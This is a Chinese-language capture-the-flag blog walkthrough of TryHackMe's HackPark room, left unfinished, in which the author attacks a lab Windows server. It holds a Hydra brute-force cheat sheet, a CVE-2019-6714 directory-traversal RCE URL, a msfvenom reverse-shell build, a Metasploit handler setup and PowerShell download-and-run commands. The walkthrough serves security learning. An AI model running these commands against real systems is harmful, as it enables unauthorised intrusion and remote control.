前言
房间地址:https://tryhackme.com/room/hackpark
使用 Hydra 暴力破解网站登录,识别并使用公共漏洞,然后升级您在此 Windows 计算机上的权限!
建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机
![图片[1],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107121343191.png?imageView2/0/format/webp/q/75)
![图片[2],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107121401758.png?imageView2/0/format/webp/q/75)
看到是人入侵Windows 使用到了MSF,看经典好像是当年的永恒之蓝漏洞
实战
靶机地址:10.10.201.235
Hackpark的引入
小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑
![图片[3],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107122454484.png?imageView2/0/format/webp/q/75)
![图片[4],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107122902804.png?imageView2/0/format/webp/q/75)
有个联系,预测可能有XSS注入,
这里有个登录,那就是爆破了
![图片[5],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107123008345.png?imageView2/0/format/webp/q/75)
我们看下 第一题:
![图片[6],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107123150933.png?imageView2/0/format/webp/q/75)
九头蛇爆破账号密码
让后看第二题
![图片[7],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107123408873.png?imageView2/0/format/webp/q/75)
Hydra 确实有很多功能,并且有许多可用的“模块”(模块的一个示例是我们上面使用的http-post-form )。
然而,这个工具不仅适用于暴力破解 HTTP 表单,还适用于其他协议,如 FTP、SSH、SMTP、SMB 等。
下面是一个迷你备忘单:
命令 | 描述 |
Hydra -P <单词列表> -v <ip> <协议> | 对您选择的协议进行暴力破解 |
Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1 -u <ip> <协议> | 您可以使用 Hydra 来暴力破解用户名和密码。它将循环遍历列表中的每个组合。(-vV = 详细模式,显示登录尝试) |
Hydra -t 1 -V -f -l <用户名> -P <单词列表> rdp://<ip> | 使用密码列表攻击 Windows 远程桌面。 |
Hydra -l <用户名> -P .<密码列表> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=登录&testcookie=1:S =位置’ | 为 Hydra 提出更具体的暴力请求。 |
我还是用burp吧 。
我前面发了很多爆破账号密码的,这里就不演示了
密码:1qaz2wsx
thm连接老是断 ,等订阅结束就打htb
![图片[8],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107125104650.png?imageView2/0/format/webp/q/75)
CVE-2019-6714利用反弹shell
看第三关
![图片[9],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107132356757.png?imageView2/0/format/webp/q/75)
![图片[10],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107132336451.png?imageView2/0/format/webp/q/75)
可以看到版本
我们搜一下漏洞库
![图片[11],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107132613982.png?imageView2/0/format/webp/q/75)
果然是有XSS漏洞 不过是在3.3.8 3.3.6应该也有
![图片[12],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107132722927.png?imageView2/0/format/webp/q/75)
CVE-2019-6714 刚开始房间也有提示
当然我们也可以找漏洞库查看
第三个答案让我们使用公共漏洞,获得对服务器的初始访问权限。
searchsploit -m aspx/webapps/46353.cs
咱们给他下到桌面上使用
nano 46353.cs
![图片[13],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107133809228.png?imageView2/0/format/webp/q/75)
好让我们按他说的做
![图片[14],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107135855469.png?imageView2/0/format/webp/q/75)
上传完看给的脚本下一步让我们怎么做
![图片[15],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107140228464.png?imageView2/0/format/webp/q/75)
这里让我们目录遍历执行RCE漏洞
所以目录遍历+Rce命令执行直接弹shell了
http://10.10.201.235/?theme=../../App_Data/files
这里是win建的站 所以命令跟Linux不太一样
![图片[16],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107152658719.png?imageView2/0/format/webp/q/75)
![图片[17],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107152718409.png?imageView2/0/format/webp/q/75)
本篇重点MSF生成木马+winpeas提权脚本利用
来到第四关
![图片[18],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107152805907.png?imageView2/0/format/webp/q/75)
![图片[19],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107152745860.png?imageView2/0/format/webp/q/75)
MSF生成shell木马:
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.8.249.244 LPORT=1238 -f exe -o reverse.exe
![图片[20],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107162000228.png?imageView2/0/format/webp/q/75)
之后开启http服务
python3 -m http.server
![图片[21],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107153507115.png?imageView2/0/format/webp/q/75)
加载msf
msfconsole
use exploit/multi/handler #进入攻击模块
之后设置我们生成的ip和端口
show options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0
set LHOST tun0
set LPORT 1238
![图片[22],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107160519380.png?imageView2/0/format/webp/q/75)
让后运行木马
run
因为Windows需要在powershell里运行 众所周知cmd和powershell不一样 所以我们需要转一下目录在靶机里运行我们msf生成的shell
移动到temp
cd Windows
cd Temp
![图片[23],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107161805922.png?imageView2/0/format/webp/q/75)
让靶机下载我们的shell
powershell Invoke-WebRequest -Uri http://10.8.249.244:8000/reverse.exe -Outfile reverse.exe
让后运行shell
.\reverse.exe
![图片[24],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107162132143.png?imageView2/0/format/webp/q/75)
OK 看图,现在已经得到目标机器的权限了
查看系统版本信息:
sysinfo
![图片[25],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107162228799.png?imageView2/0/format/webp/q/75)
好的我们继续
![图片[26],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107162451686.png?imageView2/0/format/webp/q/75)
使用国外大佬Winpeas脚本提权
好的 下面介绍一下winpeas,前期我们了解到linpeas是跑linux提权的,顾名思义,那么winpeas就是跑win机器提权的
winpeas下载:
https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat
传上去
powershell Invoke-WebRequest -Uri http://10.8.249.244:8000/winPEAS.bat -Outfile winPEAS.bat
![图片[27],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107171054628.png?imageView2/0/format/webp/q/75)
好的那我们运行他吧
![图片[28],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107171149927.png?imageView2/0/format/webp/q/75)
先shell在运行 大宝贝出现了
![图片[29],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107171513421.png?imageView2/0/format/webp/q/75)
结果非常长 而且需要耗点时间
让我们先做题吧
![图片[30],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107174005455.png?imageView2/0/format/webp/q/75)
给我们提示了
那我们进去一下
![图片[31],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107174647398.png?imageView2/0/format/webp/q/75)
SystemScheduler应该是系统文件了
![图片[32],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107174739197.png?imageView2/0/format/webp/q/75)
第一个事件应该是错误的地方
![图片[33],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107174903869.png?imageView2/0/format/webp/q/75)
我们查看一下txt
![图片[34],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107174929506.png?imageView2/0/format/webp/q/75)
石锤了 应该就是message.exe这个程序
我们在看一下winPEAS.bat
![图片[35],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107175847892.png?imageView2/0/format/webp/q/75)
看我们发现了什么?(狂喜
![图片[36],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107180029458.png?imageView2/0/format/webp/q/75)
远程admin 说明他很有可能开了3389端口 我们去扫一下看看
nmap -T4 -p 3000-4000 -Pn 10.10.201.235
![图片[37],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107180120404.png?imageView2/0/format/webp/q/75)
果然开放了3389,我们去连接看一下
nnd,失败卡住了
3389rdp admin账号密码出来了,我们尝试去连接
![图片[38],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107180456126.png?imageView2/0/format/webp/q/75)
失败了
![图片[39],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107180508864.png?imageView2/0/format/webp/q/75)
![图片[40],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107180520989.png?imageView2/0/format/webp/q/75)
Linux rdp连接也失败了 被阻断了
卡在这了。。我c 没做完
![图片[41],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107181049695.png?imageView2/0/format/webp/q/75)
时间也到期了,重来一遍要耗点时间..
![图片[42],[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了),网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240107181013509.png?imageView2/0/format/webp/q/75)
Windows渗透比linux难,目前Windows渗透我还不怎么会,这次没做完,下次更新继续做,这个房间确实有意思,但难度让我吃不消了
暂无评论内容